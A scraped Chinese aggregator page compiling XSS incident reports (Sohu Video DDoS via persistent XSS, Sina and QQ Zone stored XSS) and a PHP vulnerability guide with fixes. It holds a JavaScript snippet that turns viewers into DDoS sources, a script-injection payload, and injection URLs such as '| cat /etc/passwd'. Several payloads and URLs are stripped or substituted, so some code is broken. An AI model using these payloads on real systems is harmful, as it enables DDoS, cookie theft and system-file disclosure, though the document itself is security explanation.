51阅读吧 - 为您打造专业优质的文章分享平台!
您的当前位置: 51阅读吧 >

xss漏洞解决方案|搜狐视频XSS漏洞遭利用 千万用户成DDOS肉鸡

NO.1 搜狐视频XSS漏洞遭利用 千万用户成DDOS肉鸡

51阅读吧(51jianli.com)4月30日消息   昨日,日本CDN服务商Incapsula撰文,称其一位用户遭受了一起特殊的应用层DDos攻击(分布式拒绝服务攻击),本次攻击中黑客使用的是流量劫持技术。据统计,共有超过2.2万的网民通过浏览器向该用户的网站发起了约为2000万次的GET请求。这些网民都是在非自愿,甚至不知情的情况下成为“帮凶”的。

Incapsula官方表示不方便透露相关网站信息,且其技术团队已在积极需找解决方案,一旦问题得到解决,便会公布更多相关细节。而据白帽子技术社区的相关信息显示,本次攻击事件中被利用的那个网站便是全球网站流量排名27的搜狐视频。

此外,Incapsula在官博中也对黑客攻击所使用的技术进行了解说,大致如下:

在此次攻击事件中,黑客利用持久性XSS漏洞,通过个人资料中的头像设置在标签中注入了JS代码。这样一来,该图片每被使用一次,相关恶意代码便会传染一次,任何用户访问上述页面,都会自动执行被恶意注入的JS代码,从而触发了隐藏的

示例代码:

// JavaScript Injection in <img> tag enabled by Persistent XSS

<img src="/imagename.jpg" onload="$.getScript('')" />

// Malicious JavaScript opens hidden <iframe>

function ddos(url) {

$("body").append("<iframe id='ifr11323' style='display:none;' src=''></iframe>"); }

// Ajax DDoS tool in executes GET request every second

<html><body>

<h1>Iframe</h1>

<script>

ddos('http://upload.51jianli.com//', 'http://upload.51jianli.com/2014/0430/1398849165905.jpg');

function ddos(url,url2){

window.setInterval(function (){

$.getScript(url);

$.getScript(url2);

},1000)

}

</script>

</body></html>

被“控制”的用户每秒都会向受害人的网站发起一次请求。每秒一次看似没有多大影响,但如果一段视频30分钟来说,每个用户在看视频时都会发出1800次的请求,试想若是有成千上万的用户在观看视频的话,会如何呢?

NO.2 新浪微博及招聘的两个XSS漏洞分析与解决方法

新浪微博搜索存储型XSS漏洞:两洞结合利用
客户端绕过漏洞:新浪微博“发起投票”功能对标题(25字)、选项(20字)都进行了字数限制,但是只是客户端限制,通过代理可绕过。注入脚本如图1所示。
 XSS漏洞:直接到投票页,注入的脚本会被HTML转义。但是通过微博的搜索功能,用脚本相关的关键词(如:iframe onload)进行 投票搜索 时,出现的搜索结果包含注入的脚本,并触发脚本执行!如图2所示。
 简单利用:只需将搜索连接放到微博中,点击即中。 
 
图1 注入脚本
 
图2 脚本执行
修复方案:
服务端验证输入限制,对所有搜索输出的内容审查一下吧
作者 WebSPRing
招聘部分
新浪招聘部分个人简历没有对用户输入进行过滤导致xss漏洞,若是管理员进行查看简历时可窃取cookie等信息。
http://career.sina.com.cn/user_center.php
在创建个人简历时没有对用户数据的信息进行判读和过滤,身份证等信息都可以输入<script>等等,导致存储型xss。在管理员查看简历时会导致cookie被窃取很多地方都可以触发。。。
 
 


 
修复方案:
过滤吧!
作者 Adra1n

NO.3 腾讯QQ空间的跨站漏洞介绍以及修复解决的方案(图)

QQ空间存在一处储存型跨站
详细说明:
QQ空间应用处有一个文件夹应用,该应用可以重命名文件名,正常情况下客户端是过滤了特殊字符的。
 
 
但是特殊字符仅仅在客户端做了过滤并没有在服务端 和输出端过滤。因此我们可以通过本地修改post内容绕过这一限制
 
  
点击确定产生post
 
 
 
(拦截post数据修改post内容)
将name值修改为"><script>alert('by:pijiu')</script><"
 
 
 
回到QQ空间文件夹这时可以看到文件已经成功被重命名而且构造的"> 已经将titile标签阻断
 
 
虽然这里没有显示alert但是可以看到<script>标签已经处在可以运行的状态了。只是需要细心构造一下就可以形成攻击。
再 抓包得到json 在json里面 脚本畅通执行
  

 
如果有人通过腾讯其他xss获得QQ空间权限然后再修改此处可能会对受害者造成长期影响。
 
修复方案:

抓个漂亮妹纸,过滤下.

作者 啤酒【

NO.4 PHP漏洞全解

  PHP网页的安全性问题
  针对PHP的网站主要存在下面几种攻击方式:
  1.命令注入(Command Injection)
  2.eval注入(Eval Injection)
  3.客户端脚本攻击(script Insertion)
  4.跨网站脚本攻击(Cross Site scripting, XSS)
  5.SQL注入攻击(SQL injection)
  6.跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)
  7.Session 会话劫持(Session Hijacking)
  8.Session 固定攻击(Session Fixation)
  9.HTTP响应拆分攻击(HTTP Response Splitting)
  10.文件上传漏洞(File Upload Attack)
  11.目录穿越漏洞(Directory Traversal)
  12.远程文件包含攻击(Remote Inclusion)
  13.动态函数注入攻击(Dynamic Variable Evaluation)
  14.URL攻击(URL attack)
  15.表单提交欺骗攻击(Spoofed Form Submissions)
  16.HTTP请求欺骗攻击(Spoofed HTTP Requests)
  几个重要的php.ini选项
  Register Globals
  php>=4.2.0,php.ini的register_globals选项的默认值预设为Off,当register_globals的设定为On时,程序可以接收来自服务器的各种环境变量,包括表单提交的变量,而且由于PHP不必事先初始化变量的值,从而导致很大的安全隐患.
  例1:
  //check_admin()用于检查当前用户权限,如果是admin设置$is_admin变量为true,然后下面判断此变量是否为true,然后执行管理的一些操作
  //ex1.php
  
  if (check_admin())
  {
  $is_admin = true;
  }
  if ($is_admin)
  {
  do_something();
  }
  ?>
  这一段代码没有将$is_admin事先初始化为Flase,如果register_globals为On,那么我们直接提交 http://www.sectop.com/ex1.php?is_admin=true,就可以绕过check_admin()的验证
  例2:
  //ex2.php
  
  if (isset($_SESSION["username"]))
  {
  do_something();
  }
  else
  {
  echo "您尚未登录!";
  }
  ?>
  当register_globals=On时,我们提交http://www.sectop.com/ex2.php?_SESSION[username]=dodo,就具有了此用户的权限
  所以不管register_globals为什么,我们都要记住,对于任何传输的数据要经过仔细验证,变量要初始化
  safe_mode
  安全模式,PHP用来限制文档的存取.限制环境变量的存取,控制外部程序的执行.启用安全模式必须设置php.ini中的safe_mode = On
  1.限制文件存取
  safe_mode_include_dir = "/path1:/path2:/path3"
  不同的文件夹用冒号隔开
  2.限制环境变量的存取
  safe_mode_allowed_env_vars = string
  指定PHP程序可以改变的环境变量的前缀,如:safe_mode_allowed_env_vars = PHP_ ,当这个选项的值为空时,那么php可以改变任何环境变量
  safe_mode_protected_env_vars = string
  用来指定php程序不可改变的环境变量的前缀
  3.限制外部程序的执行
  safe_mode_exec_dir = string
  此选项指定的文件夹路径影响system.exec.popen.passthru,不影响shell_exec和"` `".
  disable_functions = string
  不同的函数名称用逗号隔开,此选项不受安全模式影响
  magic quotes
  用来让php程序的输入信息自动转义,所有的单引号("'"),双引号("""),反斜杠("")和空字符(NULL),都自动被加上反斜杠进行转义
  magic_quotes_gpc = On 用来设置magic quotes 为On,它会影响HTTP请求的数据(GET.POST.Cookies)
  程序员也可以使用addslashes来转义提交的HTTP请求数据,或者用stripslashes来删除转义
  命令注入攻击
  PHP中可以使用下列5个函数来执行外部的应用程序或函数
  system.exec.passthru.shell_exec.``(与shell_exec功能相同)
  函数原型
  string system(string command, int &return_var)
  command 要执行的命令
  return_var 存放执行命令的执行后的状态值
  string exec (string command, array &output, int &return_var)
  command 要执行的命令
  output 获得执行命令输出的每一行字符串
  return_var 存放执行命令后的状态值
  void passthru (string command, int &return_var)
  command 要执行的命令
  return_var 存放执行命令后的状态值
  string shell_exec (string command)
  command 要执行的命令
  漏洞实例
  例1:
  //ex1.php
  
  $dir = $_GET["dir"];
  if (isset($dir))
  {
  echo "
";
  system("ls -al ".$dir);
  echo "
";
  }
  ?>
  我们提交http://www.sectop.com/ex1.php?dir=| cat /etc/passwd
  提交以后,命令变成了 system("ls -al | cat /etc/passwd");
  eval注入攻击
  eval函数将输入的字符串参数当作PHP程序代码来执行
  函数原型:
  mixed eval(string code_str) //eval注入一般发生在攻击者能控制输入的字符串的时候
  //ex2.php
  
  $var = "var";
  if (isset($_GET["arg"]))
  {
  $arg = $_GET["arg"];
  eval("$var = $arg;");
  echo "$var =".$var;
  }
  ?>
  当我们提交 http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了
  动态函数
  
  func A()
  {
  dosomething();
  }
  func B()
  {
  dosomething();
  }
  if (isset($_GET["func"]))
  {
  $myfunc = $_GET["func"];
  echo $myfunc();
  }
  ?>
  程序员原意是想动态调用A和B函数,那我们提交http://www.sectop.com/ex.php?func=phpinfo 漏洞产生
  防范方法
  1.尽量不要执行外部命令
  2.使用自定义函数或函数库来替代外部命令的功能
  3.使用escapeshellarg函数来处理命令参数
  4.使用safe_mode_exec_dir指定可执行文件的路径
  esacpeshellarg函数会将任何引起参数或命令结束的字符转义,单引号"'",替换成"'",双引号""",替换成""",分号";"替换成";"
  用safe_mode_exec_dir指定可执行文件的路径,可以把会使用的命令提前放入此路径内
  safe_mode = On
  safe_mode_exec_di r= /usr/local/php/bin/
  客户端脚本植入
  客户端脚本植入(script Insertion),是指将可以执行的脚本插入到表单.图片.动画或超链接文字等对象内.当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击.
  可以被用作脚本植入的HTML标签一般包括以下几种:
  1. 无限弹框
  插入 跳转钓鱼页面
  或者使用其他自行构造的js代码进行攻击
  防范的方法
  一般使用htmlspecialchars函数来将特殊字符转换成HTML编码
  函数原型
  string htmlspecialchars (string string, int quote_style, string charset)
  string 是要编码的字符串
  quote_style 可选,值可为ENT_COMPAT ENT_QUOTES ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不转换单引号.ENT_QUOTES,表示双引号和单引号都要转换.ENT_NOQUOTES,表示双引号和单引号都不转换
  charset 可选,表示使用的字符集
  函数会将下列特殊字符转换成html编码:
  & ----> &
  " ----> "
  ' ----> '
  < ----> <
  > ----> >
  把show.php的第98行改成
  
  然后再查看插入js的漏洞页面
  xss跨站脚本攻击
  XSS(Cross Site scripting),意为跨网站脚本攻击,为了和样式表css(Cascading Style Sheet)区别,缩写为XSS
  跨站脚本主要被攻击者利用来读取网站用户的cookies或者其他个人数据,一旦攻击者得到这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限.
  跨站脚本攻击的一般步骤:
  1.攻击者以某种方式发送xss的http链接给目标用户
  2.目标用户登录此网站,在登陆期间打开了攻击者发送的xss链接
  3.网站执行了此xss攻击脚本
  4.目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息
  5.攻击者使用目标用户的信息登录网站,完成攻击
  当有存在跨站漏洞的程序出现的时候,攻击者可以构造类似 http://www.sectop.com/search.php?
  key= ,诱骗用户点击后,可以获取用户cookies值
  防范方法:
  利用htmlspecialchars函数将特殊字符转换成HTML编码
  函数原型
  string htmlspecialchars (string string, int quote_style, string charset)
  string 是要编码的字符串
  quote_style 可选,值可为ENT_COMPAT、ENT_QUOTES、ENT_NOQUOTES,默认值ENT_COMPAT,表示只转换双引号不
  转换单引号。ENT_QUOTES,表示双引号和单引号都要转换。ENT_NOQUOTES,表示双引号和单引号都不转换
  charset 可选,表示使用的字符集
  函数会将下列特殊字符转换成html编码:
  & ----> &
  " ----> "
  ' ----> '
  < ----> <
  > ----> >
  $_SERVER["PHP_SELF"]变量的跨站
  在某个表单中,如果提交参数给自己,会用这样的语句
  
" method="POST">
  ......
  
  $_SERVER["PHP_SELF"]变量的值为当前页面名称
  例:
  http://www.sectop.com/get.php
  get.php中上述的表单
  那么我们提交
  http://www.sectop.com/get.php/">
  那么表单变成
  
" method="POST">
  跨站脚本被插进去了
  防御方法还是使用htmlspecialchars过滤输出的变量,或者提交给自身文件的表单使用
  
  这样直接避免了$_SERVER["PHP_SELF"]变量被跨站
  SQL注入攻击
  SQL注入攻击(SQL Injection),是攻击者在表单中提交精心构造的sql语句,改变原来的sql语句,如果web程序没有对提交的数据经过检查,那么就会造成sql注入攻击.
  SQL注入攻击的一般步骤:
  1.攻击者访问有SQL注入漏洞的网站,寻找注入点
  2.攻击者构造注入语句,注入语句和程序中的SQL语句结合生成新的sql语句
  3.新的sql语句被提交到数据库中进行处理
  4.数据库执行了新的SQL语句,引发SQL注入攻击
  跨网站请求伪造
  CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF.攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击.攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的.
  例如:某个购物网站购买商品时,采用http://www.shop.com/buy.php?item=watch&num=1,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接
  那么如果目标用户不小心点击以后,购买的数量就成了1000个

上一篇:培养良好习惯的重要性|牛牛:写软文要培养的两个好习惯 上一篇:VR游戏试玩|索尼PS VR试玩:佩戴舒适 游戏体验极佳
与该文相关的文章

温馨提示:如果您对51阅读吧有任何建议,请通过网站联系邮箱向我们反馈,感谢各位的建议与支持!